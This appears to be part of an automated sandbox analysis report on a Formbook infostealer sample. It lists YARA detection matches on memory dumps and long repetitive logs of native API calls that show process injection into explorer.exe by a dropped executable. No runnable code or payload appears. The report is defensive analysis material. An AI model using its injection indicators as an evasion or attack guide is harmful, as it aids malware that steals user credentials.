    Source: 00000006.00000002.1400130496.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000C.00000000.1278653334.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000013.00000002.1395541115.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000013.00000002.1395541115.0000000003490000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000022.00000002.2645870331.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000022.00000002.2645870331.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000001F.00000000.2384926370.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000000.00000002.1094577858.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000A.00000000.1236138459.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000000.00000000.1066109645.000000000040D000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000022.00000002.2651453011.000000001F1E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000022.00000002.2651453011.000000001F1E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02197C0A NtResumeThread,0_2_02197C0A
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02197829 NtProtectVirtualMemory,0_2_02197829
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02190722 EnumWindows,NtSetInformationThread,TerminateProcess,LdrInitializeThunk,0_2_02190722
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_021929F9 NtWriteVirtualMemory,0_2_021929F9
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02197C17 NtResumeThread,0_2_02197C17
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02192A09 NtWriteVirtualMemory,0_2_02192A09
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_0219083D NtSetInformationThread,TerminateProcess,0_2_0219083D
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02197E9B NtResumeThread,0_2_02197E9B
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02192E9E NtWriteVirtualMemory,0_2_02192E9E
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02192CBD NtWriteVirtualMemory,0_2_02192CBD
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_021980A5 NtResumeThread,0_2_021980A5
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02192AD9 NtWriteVirtualMemory,0_2_02192AD9
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_021982D5 NtResumeThread,0_2_021982D5
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02197CC3 NtResumeThread,0_2_02197CC3
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02197F37 NtResumeThread,0_2_02197F37
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_0219076D NtSetInformationThread,TerminateProcess,0_2_0219076D
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02192D9E NtWriteVirtualMemory,0_2_02192D9E
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02192FD1 NtWriteVirtualMemory,0_2_02192FD1
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02192BC5 NtWriteVirtualMemory,0_2_02192BC5
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02197DFF NtResumeThread,0_2_02197DFF
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_02197FE1 NtResumeThread,0_2_02197FE1
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_021981E5 NtResumeThread,0_2_021981E5
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_00567829 NtProtectVirtualMemory,2_2_00567829
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_00560722 EnumWindows,NtSetInformationThread,NtProtectVirtualMemory,TerminateProcess,LdrInitializeThunk,2_2_00560722
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_0056083D NtSetInformationThread,TerminateProcess,2_2_0056083D
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_00560ADD NtProtectVirtualMemory,2_2_00560ADD
    Source: C:\Users\user\Desktop\sample.exeCode function: 2_2_0056076D NtSetInformationThread,TerminateProcess,2_2_0056076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A7C0A NtResumeThread,3_2_021A7C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A7829 NtProtectVirtualMemory,3_2_021A7829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A0722 EnumWindows,NtSetInformationThread,TerminateProcess,LdrInitializeThunk,3_2_021A0722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A29F9 NtWriteVirtualMemory,3_2_021A29F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A7C17 NtResumeThread,3_2_021A7C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A2A09 NtWriteVirtualMemory,3_2_021A2A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A083D NtSetInformationThread,TerminateProcess,3_2_021A083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A7E9B NtResumeThread,3_2_021A7E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A2E9E NtWriteVirtualMemory,3_2_021A2E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A2CBD NtWriteVirtualMemory,3_2_021A2CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A80A5 NtResumeThread,3_2_021A80A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A2AD9 NtWriteVirtualMemory,3_2_021A2AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A82D5 NtResumeThread,3_2_021A82D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A7CC3 NtResumeThread,3_2_021A7CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A7F37 NtResumeThread,3_2_021A7F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A076D NtSetInformationThread,TerminateProcess,3_2_021A076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A2D9E NtWriteVirtualMemory,3_2_021A2D9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A2FD1 NtWriteVirtualMemory,3_2_021A2FD1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A2BC5 NtWriteVirtualMemory,3_2_021A2BC5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A7DFF NtResumeThread,3_2_021A7DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A7FE1 NtResumeThread,3_2_021A7FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_021A81E5 NtResumeThread,3_2_021A81E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B7C0A NtResumeThread,5_2_021B7C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B7829 NtProtectVirtualMemory,5_2_021B7829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B0722 EnumWindows,NtSetInformationThread,TerminateProcess,LdrInitializeThunk,5_2_021B0722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B29F9 NtWriteVirtualMemory,5_2_021B29F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B7C17 NtResumeThread,5_2_021B7C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B2A09 NtWriteVirtualMemory,5_2_021B2A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B083D NtSetInformationThread,TerminateProcess,5_2_021B083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B7E9B NtResumeThread,5_2_021B7E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B2E9E NtWriteVirtualMemory,5_2_021B2E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B2CBD NtWriteVirtualMemory,5_2_021B2CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B80A5 NtResumeThread,5_2_021B80A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B2AD9 NtWriteVirtualMemory,5_2_021B2AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B82D5 NtResumeThread,5_2_021B82D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B7CC3 NtResumeThread,5_2_021B7CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B7F37 NtResumeThread,5_2_021B7F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B076D NtSetInformationThread,TerminateProcess,5_2_021B076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B2D9E NtWriteVirtualMemory,5_2_021B2D9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B2FD1 NtWriteVirtualMemory,5_2_021B2FD1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B2BC5 NtWriteVirtualMemory,5_2_021B2BC5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B7DFF NtResumeThread,5_2_021B7DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B7FE1 NtResumeThread,5_2_021B7FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 5_2_021B81E5 NtResumeThread,5_2_021B81E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A750 NtCreateFile,LdrInitializeThunk,6_2_1F48A750
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A700 NtProtectVirtualMemory,LdrInitializeThunk,6_2_1F48A700
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A720 NtResumeThread,LdrInitializeThunk,6_2_1F48A720
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A610 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_1F48A610
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A6A0 NtCreateSection,LdrInitializeThunk,6_2_1F48A6A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A540 NtDelayExecution,LdrInitializeThunk,6_2_1F48A540
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A560 NtQuerySystemInformation,LdrInitializeThunk,6_2_1F48A560
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A5F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_1F48A5F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A410 NtQueryInformationToken,LdrInitializeThunk,6_2_1F48A410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A480 NtMapViewOfSection,LdrInitializeThunk,6_2_1F48A480
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A4A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_1F48A4A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A360 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_1F48A360
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A3E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_1F48A3E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A240 NtReadFile,LdrInitializeThunk,6_2_1F48A240
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A2D0 NtClose,LdrInitializeThunk,6_2_1F48A2D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A710 NtQuerySection,6_2_1F48A710
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A780 NtOpenDirectoryObject,6_2_1F48A780
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A650 NtQueueApcThread,6_2_1F48A650
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A6D0 NtCreateProcessEx,6_2_1F48A6D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48BD40 NtSuspendThread,6_2_1F48BD40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A520 NtEnumerateKey,6_2_1F48A520
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A5A0 NtWriteVirtualMemory,6_2_1F48A5A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A460 NtOpenProcess,6_2_1F48A460
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A470 NtSetInformationFile,6_2_1F48A470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48B470 NtOpenThread,6_2_1F48B470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48B410 NtOpenProcessToken,6_2_1F48B410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A430 NtQueryVirtualMemory,6_2_1F48A430
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48ACE0 NtCreateMutant,6_2_1F48ACE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A350 NtQueryValueKey,6_2_1F48A350
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A370 NtQueryInformationProcess,6_2_1F48A370
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A310 NtEnumerateValueKey,6_2_1F48A310
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A3D0 NtCreateKey,6_2_1F48A3D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A260 NtWriteFile,6_2_1F48A260
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A220 NtWaitForSingleObject,6_2_1F48A220
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48BA30 NtSetContextThread,6_2_1F48BA30
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A2F0 NtQueryInformationFile,6_2_1F48A2F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48A800 NtSetValueKey,6_2_1F48A800
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F48B0B0 NtGetContextThread,6_2_1F48B0B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567829 NtProtectVirtualMemory,6_2_00567829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567C0A NtSetInformationThread,6_2_00567C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_0056083D NtSetInformationThread,6_2_0056083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_005680A5 NtSetInformationThread,6_2_005680A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_005681E5 NtSetInformationThread,6_2_005681E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_005682D5 NtSetInformationThread,6_2_005682D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00560ADD NtProtectVirtualMemory,6_2_00560ADD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567C17 NtSetInformationThread,6_2_00567C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567CC3 NtSetInformationThread,6_2_00567CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567DFF NtSetInformationThread,6_2_00567DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567E9B NtSetInformationThread,6_2_00567E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_0056076D NtSetInformationThread,6_2_0056076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567F37 NtSetInformationThread,6_2_00567F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_00567FE1 NtSetInformationThread,6_2_00567FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02147829 NtProtectVirtualMemory,8_2_02147829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02140722 EnumWindows,NtSetInformationThread,TerminateProcess,LdrInitializeThunk,8_2_02140722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_021429F9 NtWriteVirtualMemory,8_2_021429F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142A09 NtWriteVirtualMemory,8_2_02142A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_0214083D NtSetInformationThread,TerminateProcess,8_2_0214083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142E9E NtWriteVirtualMemory,8_2_02142E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142CBD NtWriteVirtualMemory,8_2_02142CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142AD9 NtWriteVirtualMemory,8_2_02142AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_0214076D NtSetInformationThread,TerminateProcess,8_2_0214076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142D9E NtWriteVirtualMemory,8_2_02142D9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142FD1 NtWriteVirtualMemory,8_2_02142FD1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_02142BC5 NtWriteVirtualMemory,8_2_02142BC5
    Source: C:\Windows\explorer.exeCode function: 9_2_05E08852 NtDeleteFile,NtCreateFile,NtReadFile,NtWriteFile,NtClose,9_2_05E08852
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A750 NtCreateFile,LdrInitializeThunk,10_2_1F47A750
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A700 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1F47A700
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A720 NtResumeThread,LdrInitializeThunk,10_2_1F47A720
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A610 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_1F47A610
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A6A0 NtCreateSection,LdrInitializeThunk,10_2_1F47A6A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A540 NtDelayExecution,LdrInitializeThunk,10_2_1F47A540
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A560 NtQuerySystemInformation,LdrInitializeThunk,10_2_1F47A560
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A5F0 NtReadVirtualMemory,LdrInitializeThunk,10_2_1F47A5F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A410 NtQueryInformationToken,LdrInitializeThunk,10_2_1F47A410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A480 NtMapViewOfSection,LdrInitializeThunk,10_2_1F47A480
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A4A0 NtUnmapViewOfSection,LdrInitializeThunk,10_2_1F47A4A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A360 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_1F47A360
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A3E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_1F47A3E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A240 NtReadFile,LdrInitializeThunk,10_2_1F47A240
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A2D0 NtClose,LdrInitializeThunk,10_2_1F47A2D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A710 NtQuerySection,10_2_1F47A710
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A780 NtOpenDirectoryObject,10_2_1F47A780
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A650 NtQueueApcThread,10_2_1F47A650
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A6D0 NtCreateProcessEx,10_2_1F47A6D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47BD40 NtSuspendThread,10_2_1F47BD40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A520 NtEnumerateKey,10_2_1F47A520
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A5A0 NtWriteVirtualMemory,10_2_1F47A5A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A460 NtOpenProcess,10_2_1F47A460
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47B470 NtOpenThread,10_2_1F47B470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A470 NtSetInformationFile,10_2_1F47A470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47B410 NtOpenProcessToken,10_2_1F47B410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A430 NtQueryVirtualMemory,10_2_1F47A430
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47ACE0 NtCreateMutant,10_2_1F47ACE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A350 NtQueryValueKey,10_2_1F47A350
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A370 NtQueryInformationProcess,10_2_1F47A370
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A310 NtEnumerateValueKey,10_2_1F47A310
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A3D0 NtCreateKey,10_2_1F47A3D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A260 NtWriteFile,10_2_1F47A260
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A220 NtWaitForSingleObject,10_2_1F47A220
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47BA30 NtSetContextThread,10_2_1F47BA30
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A2F0 NtQueryInformationFile,10_2_1F47A2F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47A800 NtSetValueKey,10_2_1F47A800
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_1F47B0B0 NtGetContextThread,10_2_1F47B0B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567829 NtProtectVirtualMemory,10_2_00567829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567C0A NtSetInformationThread,10_2_00567C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_0056083D NtSetInformationThread,10_2_0056083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_005680A5 NtSetInformationThread,10_2_005680A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_005681E5 NtSetInformationThread,10_2_005681E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_005682D5 NtSetInformationThread,10_2_005682D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00560ADD NtProtectVirtualMemory,10_2_00560ADD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567C17 NtSetInformationThread,10_2_00567C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567CC3 NtSetInformationThread,10_2_00567CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567DFF NtSetInformationThread,10_2_00567DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567E9B NtSetInformationThread,10_2_00567E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_0056076D NtSetInformationThread,10_2_0056076D
